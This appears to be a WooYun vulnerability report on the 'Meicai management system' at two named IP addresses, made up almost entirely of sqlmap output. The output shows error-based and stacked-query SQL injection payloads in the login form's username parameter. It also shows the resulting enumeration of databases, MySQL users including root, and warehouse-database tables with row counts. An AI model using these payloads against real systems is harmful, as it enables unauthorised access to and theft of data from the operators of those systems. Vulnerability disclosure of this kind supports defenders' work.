WooYun.org

http://119.90.53.100/   美菜管理系统
http://119.90.53.180/  美菜管理系统

sqlmap identified the following injection points with a total of 435 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: password=8&securityCode=4&username=' AND (SELECT 2973 FROM(SELECT COUNT(*),CONCAT(0x7166747171,(SELECT (CASE WHEN (2973=2973) THEN 1 ELSE 0 END)),0x716b626371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXse'='xXse
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: password=8&securityCode=4&username='; SELECT SLEEP(5)-- 
    Vector: ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])-- 
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: password=8&securityCode=4&username=' AND (SELECT 2973 FROM(SELECT COUNT(*),CONCAT(0x7166747171,(SELECT (CASE WHEN (2973=2973) THEN 1 ELSE 0 END)),0x716b626371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXse'='xXse
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: password=8&securityCode=4&username='; SELECT SLEEP(5)-- 
    Vector: ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])-- 
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL 5.0
available databases [6]:
[*] Commodity
[*] information_schema
[*] mysql
[*] performance_schema
[*] tt
[*] wms_test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: password=8&securityCode=4&username=' AND (SELECT 2973 FROM(SELECT COUNT(*),CONCAT(0x7166747171,(SELECT (CASE WHEN (2973=2973) THEN 1 ELSE 0 END)),0x716b626371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXse'='xXse
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: password=8&securityCode=4&username='; SELECT SLEEP(5)-- 
    Vector: ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])-- 
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL 5.0
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'yssstp'@'%'
Database: wms_test
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| t_admin_user_power          | 3876    |
| t_product_category          | 3345    |
| t_product                   | 2654    |
| t_product_set               | 2654    |
| t_stock_log                 | 1595    |
| t_cargo_space               | 1190    |
| t_shop                      | 702     |
| t_admin_group_power         | 438     |
| t_admin_user_log            | 399     |
| t_order_log                 | 255     |
| t_order_product             | 167     |
| t_cargospace_log            | 146     |
| t_supplier_purchase_product | 76      |
| t_supplier_appointment      | 54      |
| t_order                     | 52      |
| t_supplier_purchase         | 52      |
| t_stock                     | 47      |
| t_supplier                  | 44      |
| t_supplier_warehouse        | 44      |
| t_pallet                    | 37      |
| t_product_added             | 28      |
| t_product_receipt           | 27      |
| t_warehouse                 | 25      |
| t_admin_user_warehouse      | 21      |
| t_admin_user_process        | 15      |
| t_process_order             | 15      |
| t_admin_user                | 13      |
| t_process_product           | 12      |
| t_message                   | 11      |
| t_warehouse_aisle           | 10      |
| t_order_wave                | 9       |
| t_process_product_detail    | 9       |
| t_warehouse_area            | 9       |
| t_stock_lock_log            | 7       |
| t_cargospace_transfer       | 5       |
| t_process                   | 4       |
| t_admin_group               | 3       |
| t_cargoowner_warehouse      | 3       |
| t_return                    | 3       |
| t_return_product            | 3       |
| t_cargoowner                | 2       |
| t_order_deliver             | 2       |
| t_order_deliver_detail      | 2       |
| t_order_wave_detail         | 2       |
| t_product_defective         | 2       |
| t_app                       | 1       |
| t_app_cargoowner            | 1       |
| t_cargospace_freeze         | 1       |
| t_cargospace_freeze_list    | 1       |
| t_inventory                 | 1       |
| t_order_box                 | 1       |
+-----------------------------+---------+